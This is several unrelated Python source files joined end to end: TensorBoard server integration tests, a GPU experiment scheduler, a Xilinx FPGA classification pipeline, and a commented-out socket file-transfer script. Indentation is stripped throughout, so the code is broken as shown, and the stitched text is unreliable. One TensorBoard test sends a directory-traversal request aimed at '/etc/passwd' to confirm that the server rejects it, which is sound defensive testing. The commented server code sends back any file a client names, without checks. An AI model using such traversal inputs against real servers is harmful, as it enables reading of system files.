# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import socket
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard import tensorboard
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins import base_plugin
class FakePlugin(base_plugin.TBPlugin):
"""A plugin with no functionality."""
def __init__(self, plugin_name, is_active_value, routes_mapping):
"""Constructs a fake plugin.
Args:
plugin_name: The name of this plugin.
is_active_value: Whether the plugin is active.
routes_mapping: A dictionary mapping from route (string URL path) to the
method called when a user issues a request to that route.
"""
self.plugin_name = plugin_name
self._is_active_value = is_active_value
self._routes_mapping = routes_mapping
def get_plugin_apps(self, multiplexer, logdir):
"""Returns a mapping from routes to handlers offered by this plugin.
Args:
multiplexer: The event multiplexer.
logdir: The path to the directory containing logs.
Returns:
A dictionary mapping from routes to handlers offered by this plugin.
"""
return self._routes_mapping
def is_active(self):
"""Returns whether this plugin is active.
Returns:
A boolean. Whether this plugin is active.
"""
return self._is_active_value
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self.temp_dir = self._GenerateTestData()
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
plugins = [
FakePlugin(plugin_name='foo', is_active_value=True, routes_mapping={}),
FakePlugin(plugin_name='bar', is_active_value=False, routes_mapping={})
]
app = application.TensorBoardWSGIApp(
self.temp_dir, plugins, multiplexer, reload_interval=0)
try:
self._server = serving.BaseWSGIServer('localhost', 0, app)
# 0 to pick an unused port.
except IOError:
# BaseWSGIServer has a preference for IPv4. If that didn't work, try again
# with an explicit IPv6 address.
self._server = serving.BaseWSGIServer('::1', 0, app)
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
def testPluginsListing(self):
"""Test the format of the data/plugins_listing endpoint."""
parsed_object = self._getJson('/data/plugins_listing')
# Plugin foo is active. Plugin bar is not.
self.assertEqual(parsed_object, {'foo': True, 'bar': False})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run'],
'tensors': [],
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testScalars(self):
"""Test the format of /data/scalars."""
data = self._getJson('/data/scalars?run=run1&tag=simple_values')
self.assertEqual(len(data), self._SCALAR_COUNT)
def testScalarsCsv(self):
"""Test the csv format of /data/scalars."""
data = self._get(
'/data/scalars?run=run1&tag=simple_values&format=csv').read()
line_count = data.count('\n')
self.assertEqual(line_count,
self._SCALAR_COUNT + 1) # include 1 more line for header
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
        100 * i, for i in [1, _SCALAR_COUNT].
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
    # Write _SCALAR_COUNT simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we
# can tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
return temp_dir
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testMultipleDirectories(self):
logdir = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testNormalizesPaths(self):
logdir = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testAbsolutifies(self):
logdir = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsGCSPath(self):
logdir = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRespectsHDFSPath(self):
logdir = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir = 'gs://~/foo/path'
expected = {'gs://~/foo/path': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testDoesNotNormalizeGCSPath(self):
logdir = 'gs://foo/./path//..'
expected = {'gs://foo/./path//..': None}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
def testRunNameWithGCSPath(self):
logdir = 'lol:gs://foo/path'
expected = {'gs://foo/path': 'lol'}
self.assertEqual(application.parse_event_files_spec(logdir), expected)
class TensorBoardAssetsTest(test.TestCase):
def testTagFound(self):
tag = application.get_tensorboard_tag()
self.assertTrue(tag)
app = application.standard_tensorboard_wsgi('', True, 60, [])
self.assertEqual(app.tag, tag)
class TensorBoardPluginsTest(test.TestCase):
def testPluginsAdded(self):
def foo_handler():
pass
def bar_handler():
pass
plugins = [
FakePlugin(
plugin_name='foo',
is_active_value=True,
routes_mapping={'/foo_route': foo_handler}),
FakePlugin(
plugin_name='bar',
is_active_value=True,
routes_mapping={'/bar_route': bar_handler}),
]
# The application should have added routes for both plugins.
app = application.standard_tensorboard_wsgi('', True, 60, plugins)
# The routes are prefixed with /data/plugin/[plugin name].
self.assertDictContainsSubset({
'/data/plugin/foo/foo_route': foo_handler,
'/data/plugin/bar/bar_route': bar_handler,
}, app.data_applications)
class TensorboardSimpleServerConstructionTest(test.TestCase):
"""Tests that the default HTTP server is constructed without error.
Mostly useful for IPv4/IPv6 testing. This test should run with only IPv4, only
IPv6, and both IPv4 and IPv6 enabled.
"""
class _StubApplication(object):
tag = ''
def testMakeServerBlankHost(self):
# Test that we can bind to all interfaces without throwing an error
server, url = tensorboard.make_simple_server(
self._StubApplication(),
host='',
port=0) # Grab any available port
self.assertTrue(server)
self.assertTrue(url)
def testSpecifiedHost(self):
one_passed = False
try:
_, url = tensorboard.make_simple_server(
self._StubApplication(),
host='127.0.0.1',
port=0)
self.assertStartsWith(actual=url, expected_start='http://127.0.0.1:')
one_passed = True
except socket.error:
# IPv4 is not supported
pass
try:
_, url = tensorboard.make_simple_server(
self._StubApplication(),
host='::1',
port=0)
self.assertStartsWith(actual=url, expected_start='http://[::1]:')
one_passed = True
except socket.error:
# IPv6 is not supported
pass
self.assertTrue(one_passed) # We expect either IPv4 or IPv6 to be supported
class TensorBoardApplicationConstructionTest(test.TestCase):
def testExceptions(self):
logdir = '/fake/foo'
multiplexer = event_multiplexer.EventMultiplexer()
# Fails if there is an unnamed plugin
with self.assertRaises(ValueError):
# This plugin lacks a name.
plugins = [
FakePlugin(plugin_name=None, is_active_value=True, routes_mapping={})
]
application.TensorBoardWSGIApp(logdir, plugins, multiplexer, 0)
# Fails if there are two plugins with same name
with self.assertRaises(ValueError):
plugins = [
FakePlugin(
plugin_name='foo', is_active_value=True, routes_mapping={}),
FakePlugin(
plugin_name='foo', is_active_value=True, routes_mapping={}),
]
application.TensorBoardWSGIApp(logdir, plugins, multiplexer, 0)
if __name__ == '__main__':
test.main()
|
run_multiple.py
|
import subprocess
from subprocess import Popen
import multiprocessing as mp
mp = mp.get_context('spawn')
from itertools import product
import os
import time
from parse_dir import parse_env_subfolder, plot_best, plot_best_per_model
from main import full_train_test
import argparse
import json
def create_launch_proc(command_param, device_to_use):
env_folder = "config/env_base/"
env_ext_folder = "config/env_ext/"
model_folder = "config/model/"
model_ext_folder = "config/model_ext/"
exp_dir = 'out/'
env_file = env_folder+command_param['env']+'.json'
env_ext_file = env_ext_folder+command_param['env_ext']+'.json'
model_config = model_folder+command_param['model']+'.json'
model_ext = model_ext_folder+command_param['model_ext']+'.json'
seed = command_param['seed']
# need to be the same order as full_train_test
# full_train_test(env_config, model_config, env_extension, model_extension, exp_dir, seed=0, device=-1, args=None):
p = mp.Process(target=full_train_test, args=[env_file, model_config, env_ext_file, model_ext, exp_dir, seed, device_to_use])
p.start()
return p
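# Illustrative sketch (assumed file names, not from the original configs):
# a command_param dict built below looks like
#   {'env': 'gridworld', 'env_ext': 'base', 'model': 'dqn',
#    'model_ext': 'no_head', 'seed': 0}
# and create_launch_proc resolves it to config/env_base/gridworld.json,
# config/model/dqn.json, and so on.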
def load_config_file(file):
run_multiple_config_path = os.path.join('config/run_multiple_config', file)
config = json.load(open(run_multiple_config_path, 'r'))
return config
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Experiment scheduler arguments')
parser.add_argument("-config_multiple_file", type=str, default="test.json", help="config file where you put your schedule")
args = parser.parse_args()
config = load_config_file(args.config_multiple_file)
model_to_test = config['model_to_test']
extension_to_test = config['extension_to_test']
env_config = config['env_config']
env_ext = config['env_ext']
gpu_available = config['gpu_available']
capacity_per_gpu = config['capacity_per_gpu']
n_seed = config['n_seed']
#extension_to_test = ["small_text_part", "bigger_text_part", "bigger_vision", "smaller_everything", "no_head"]
n_gpu = len(gpu_available)
n_processes = capacity_per_gpu * n_gpu
seeds = [i for i in range(n_seed)]
command_keys = ['env', 'env_ext', 'model', 'model_ext', 'seed']
all_commands = [dict(zip(command_keys, command_param)) for command_param in product(env_config, env_ext, model_to_test, extension_to_test, seeds)]
print("{} experiments to run.".format(len(all_commands)))
processes = []
command_remains = len(all_commands) > 0
for expe_num in range(n_gpu * capacity_per_gpu):
        # Launch experiments, filling every available process slot
try:
command_param = all_commands.pop()
except IndexError:
command_remains = False
break
print("Launching new expe, {} remains".format(len(all_commands)))
device_to_use = gpu_available[expe_num % n_gpu]
processes.append(create_launch_proc(command_param=command_param,
device_to_use=device_to_use))
while command_remains:
for p_num, p in enumerate(processes):
if not p.is_alive():
try:
command_param = all_commands.pop()
print("Launching new exp, {} remaining".format(len(all_commands)))
except IndexError:
command_remains = False
break
device_to_use = gpu_available[p_num % n_gpu]
new_p = create_launch_proc(command_param=command_param, device_to_use=device_to_use)
processes[p_num] = new_p
time.sleep(2)
for expe in processes:
expe.join()
print('Done running experiments')
for env_str, env_ext_str in product(env_config, env_ext):
out_dir = "out/" + env_str + '_' + env_ext_str
parse_env_subfolder(out_dir=out_dir)
plot_best(env_dir=out_dir)
plot_best_per_model(env_dir=out_dir)
|
mp_classify.py
|
#!/usr/bin/env python
#
# // SPDX-License-Identifier: BSD-3-CLAUSE
#
# (C) Copyright 2018, Xilinx, Inc.
#
import sys
import timeit
import xdnn, xdnn_io
import numpy as np
import multiprocessing as mp
import ctypes
import threading
import time
import os
manager = mp.Manager()
class ZmqResultPublisher:
def __init__(self, devid):
import zmq
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUB)
self.socket.bind("tcp://*:55{}5".format(devid))
def send(self, data):
self.socket.send(data)
def xdnn_wait( fpgaRT, q, qPost, prepProcQ):
numProcessed = 0
while True:
i,img_list, sMemListIdx = q.get()
if i is None:
break
numProcessed += len(img_list)
fpgaRT.get_result(i)
for j in sMemListIdx:
prepProcQ.put(j)
qPost.put ( (i, img_list) )
qPost.put ( ( None, None ))
def fpga_process_async (qFrom, qTo, args, num_img, sharedInputArrs, prepProcQ, streamQ, fpgaOutputs):
ret, handles = xdnn.createHandle(args['xclbin'], "kernelSxdnn_0", [args["deviceID"]])
if ret != 0:
sys.exit(1)
fpgaRT = xdnn.XDNNFPGAOp(handles, args)
qWait = mp.Queue(maxsize=100)
numStreams = args['numstream']
bsz = args['batch_sz']
input_ptrs = []
for i in range(numStreams):
input_ptrs.append([])
numProcessed = 0
t = threading.Thread(target=xdnn_wait, args=(fpgaRT, qWait, qTo, prepProcQ, ))
t.start()
#startTime = time.time()
while numProcessed < num_img or args['perpetual']:
img_list = np.full( (bsz,), -1, dtype = np.int32 )
sId = streamQ.get()
input_ptrs[sId] = []
shMemIdxArr = []
for j in range(bsz):
(sMemIdx, img_idx) = qFrom.get()
numProcessed += 1
img_list[j] = img_idx
nparr_view = np.frombuffer(sharedInputArrs[sMemIdx].get_obj(), dtype = np.float32)
nparr_view = nparr_view[np.newaxis, ...]
input_ptrs[sId].append( nparr_view.ctypes.data_as(ctypes.POINTER(ctypes.c_float)) )
shMemIdxArr.append(sMemIdx)
if numProcessed == num_img:
break
npout_view = np.frombuffer(fpgaOutputs[sId].get_obj(), dtype = np.float32)
fpgaRT.exec_async( input_ptrs[sId], npout_view, sId)
qWait.put((sId, img_list, shMemIdxArr))
qWait.put ((None, None, None))
#elapsedTime = ( time.time() - startTime )
#print ( "FPGA_process: ", float(numProcessed)/elapsedTime, "img/s")
t.join()
xdnn.closeHandle()
#
# This function post-processes FPGA output:
# 1) Compute the final FC + Softmax layers
# 2) Print classification & accuracy
#
def post_process ( qFrom, args, img_paths, streamQ, fpgaOutputs):
numProcessed = 0
labels = xdnn_io.get_labels(args['labels'])
zmqPub = None
if args['zmqpub']:
zmqPub = ZmqResultPublisher(args['deviceID'])
goldenMap = None
if args['golden']:
goldenMap = xdnn_io.getGoldenMap(args['golden'])
top5Count = 0
top1Count = 0
(fcWeight, fcBias) = xdnn_io.loadFCWeightsBias(args)
bsz = args['batch_sz']
fcOutput = np.empty((bsz, args['outsz'],), dtype=np.float32, order='C')
start = 0
while True:
(sId, img_idx) = qFrom.get()
if numProcessed == 0:
start = timeit.default_timer()
if sId is None or img_idx is None:
break
imgList = []
for x in np.nditer(img_idx):
if x >= 0:
imgList.append(img_paths[x])
numProcessed += 1
npout_view = np.frombuffer(fpgaOutputs[sId].get_obj(), dtype = np.float32)
xdnn.computeFC(fcWeight, fcBias, npout_view, bsz, args['outsz'], args['fpgaoutsz'], fcOutput)
streamQ.put(sId)
smaxOutput = xdnn.computeSoftmax(fcOutput)
if args['golden']:
for i,p in enumerate ( imgList ):
top1Count += xdnn_io.isTopK(smaxOutput[i], goldenMap, p, labels, 1)
top5Count += xdnn_io.isTopK(smaxOutput[i], goldenMap, p, labels, 5)
if zmqPub is not None:
predictMsg = xdnn_io.getClassification(smaxOutput, imgList, labels, zmqPub = True)
zmqPub.send(predictMsg)
print ( "%g images/s" % ( float(numProcessed) / (time.time() - start ) ))
if args['golden']:
print ("\nAverage accuracy (n=%d) Top-1: %.1f%%, Top-5: %.1f%%\n") \
% (numProcessed,
float(top1Count)/float(numProcessed)*100.,
float(top5Count)/float(numProcessed)*100.)
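# Minimal numpy sketch of the FC + softmax stage above, assuming xdnn.computeFC
# implements a plain affine layer; this stand-in is for illustration only and
# is not used by the original pipeline.
def _reference_fc_softmax(fpga_out, fcWeight, fcBias):
    # Affine layer: one row of logits per batch element.
    logits = np.dot(fpga_out, fcWeight.T) + fcBias
    # Numerically stable softmax over the class axis.
    shifted = logits - np.max(logits, axis=1, keepdims=True)
    exps = np.exp(shifted)
    return exps / np.sum(exps, axis=1, keepdims=True)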
class PreProcessManager(object):
def __init__(self, args,q, img_paths, sharedInputArrs, prepProcQ):
ret = xdnn.createManager(args['xlnxlib'])
if ret != True:
sys.exit(1)
np.random.seed(123) # for reproducibility
self._args = args
self._q = q
self._imgpaths = img_paths
current = mp.current_process()
self._procid = (int(current._identity[0]) - 1) % args['numprepproc']
self._sharedmem = sharedInputArrs
self._prepQ = prepProcQ
        # HWC format, as this is the native format that comes out of JPEG decode
self._meanarr = np.zeros ( (args['in_shape'][1], args['in_shape'][2], args['in_shape'][0],), dtype = np.float32, order='C' )
self._meanarr += args['img_mean']
def prepImage(self, inum):
buf_id = self._prepQ.get()
np_arr = np.frombuffer(self._sharedmem[buf_id].get_obj(), dtype = np.float32)
np_arr = np.reshape ( np_arr, (1,) + self._args['in_shape'], order = 'C')
np_arr[:], _ = xdnn_io.loadImageBlobFromFile(self._imgpaths[inum], self._args['img_raw_scale'], self._meanarr,
self._args['img_input_scale'], self._args['in_shape'][1], self._args['in_shape'][2])
self._q.put ( (buf_id, inum) )
prep_inst = None
def init_prepImage (args, q, img_paths, sharedInputArrs, prepProcQ):
global prep_inst
prep_inst = PreProcessManager(args, q, img_paths, sharedInputArrs, prepProcQ)
def run_prepImage (imgpath_idx):
return prep_inst.prepImage(imgpath_idx)
ready_list = []
def dummy_func(index):
global ready_list
ready_list.append(index)
def main():
parser = xdnn_io.default_parser_args()
parser.add_argument('--numprepproc', type=int, default=1,
help='number of parallel processes used to decode and quantize images')
parser.add_argument('--numstream', type=int, default=16,
help='number of FPGA streams')
parser.add_argument('--deviceID', type = int, default = 0,
help='FPGA no. -> FPGA ID to run in case multiple FPGAs')
args = parser.parse_args()
args = xdnn_io.make_dict_args(args)
ret = xdnn.createManager(args['xlnxlib'])
if ret != True:
sys.exit(1)
sharedInputArrs = []
fpgaOutputs = []
qPrep = mp.Queue(maxsize=args['numprepproc']*10)
qFpga = mp.Queue(maxsize=100)
streamQ = mp.Queue(maxsize=args['numstream'])
prepProcQ = mp.Queue(maxsize=100)
for i in range( args['numstream'] ):
shared_arr = mp.Array(ctypes.c_float, args['batch_sz'] * args['fpgaoutsz'])
fpgaOutputs.append(shared_arr)
streamQ.put ( i )
for i in range(100):
bufSize = np.prod(args['in_shape'])
sharedInputArrs.append( mp.Array(ctypes.c_float, bufSize) )
prepProcQ.put (i)
img_paths = xdnn_io.getFilePaths(args['images'])
p = mp.Pool( initializer = init_prepImage, initargs = (args, qPrep, img_paths, sharedInputArrs, prepProcQ, ), processes = args['numprepproc'])
xdnnProc = mp.Process(target=fpga_process_async, args=(qPrep, qFpga, args, len(img_paths), sharedInputArrs,prepProcQ, streamQ, fpgaOutputs,))
xdnnProc.start()
postProc = mp.Process(target=post_process, args=(qFpga, args, img_paths,streamQ, fpgaOutputs,))
postProc.start()
if args['perpetual']:
while True:
res = [p.map_async(run_prepImage, range(len(img_paths)))]
for j in res:
j.wait()
del j
else:
p.map_async(run_prepImage, range(len(img_paths)))
xdnnProc.join()
postProc.join()
p.close()
p.join()
if __name__ == '__main__':
main()
|
server.py
|
import socket, time, subprocess,pickle
from threading import Thread
from SocketServer import ThreadingMixIn
# '''
# TCP_IP = 'localhost'
# TCP_PORT = 9001
# BUFFER_SIZE = 1024
# class ClientThread(Thread):
# def __init__(self,ip,port,sock):
# Thread.__init__(self)
# self.ip = ip
# self.port = port
# self.sock = sock
# print " New thread started for "+ip+":"+str(port)
# def run(self):
# filename = self.sock.recv(BUFFER_SIZE)
# print "Filename Bitches : "+filename
# # filename='mytext.txt'
# f = open(filename,'rb')
# while True:
# l = f.read(BUFFER_SIZE)
# while (l):
# self.sock.send(l)
# # print('Sent ',repr(l))
# l = f.read(BUFFER_SIZE)
# if not l:
# f.close()
# self.sock.close()
# break
# tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# tcpsock.bind((TCP_IP, TCP_PORT))
# threads = []
# while True:
# tcpsock.listen(5)
# print "Waiting for incoming connections..."
# (conn, (ip,port)) = tcpsock.accept()
# print 'Got connection from ', (ip,port)
# newthread = ClientThread(ip,port,conn)
# newthread.start()
# threads.append(newthread)
# for t in threads:
# t.join()
# '''
# '''
# TCP_IP = '10.196.7.142'
# TCP_PORT = 12121
# BUFFER_SIZE = 1024
# tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
# tcpsock.bind((TCP_IP, TCP_PORT))
# tcpsock.settimeout(5)
# try:
# tcpsock.listen(5)
# print "Checking for Node Alive "+ TCP_IP
# (conn, (ip, port)) = tcpsock.accept()
# msg = conn.recv(1024)
# except socket.timeout as e:
# print e
# if msg != "Alive":
# child.liveStatus = False
# print "Node is Dead AF : "+ ip
# else:
# print "Node is Alive :) " + ip
# tcpsock.close()
# '''
# # while True:
# # TCP_IP = '10.196.7.181'
# # # some_IP = 'localhost'
# # TCP_PORT = 12121
# # BUFFER_SIZE = 1024
# # print "TCP " +TCP_IP
# # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # s.connect(("10.196.7.181", TCP_PORT))
# # msg = "Alive"
# # print msg
# # s.send(msg)
# # s.close()
# # print "I'm Alive BRO!!!"
# # time.sleep(100)
# import subprocess
# # filename = 'client.py'
# # hashList = []
# # for i in range(1,4+1):
# # bashcommand = "md5sum "+str(filename)
# # Hash = subprocess.check_output(['bash','-c', bashcommand])
# # Hash = Hash.split(' ')
# # print Hash[0]
# # hashList.append(Hash[0])
# # print(hashList)
# # bashCommand = "ls -l | awk '{print $6, $7, $8, $9 }'"
# # fileList = subprocess.check_output(['bash','-c', bashCommand])
# # fileList = fileList.split('\n')
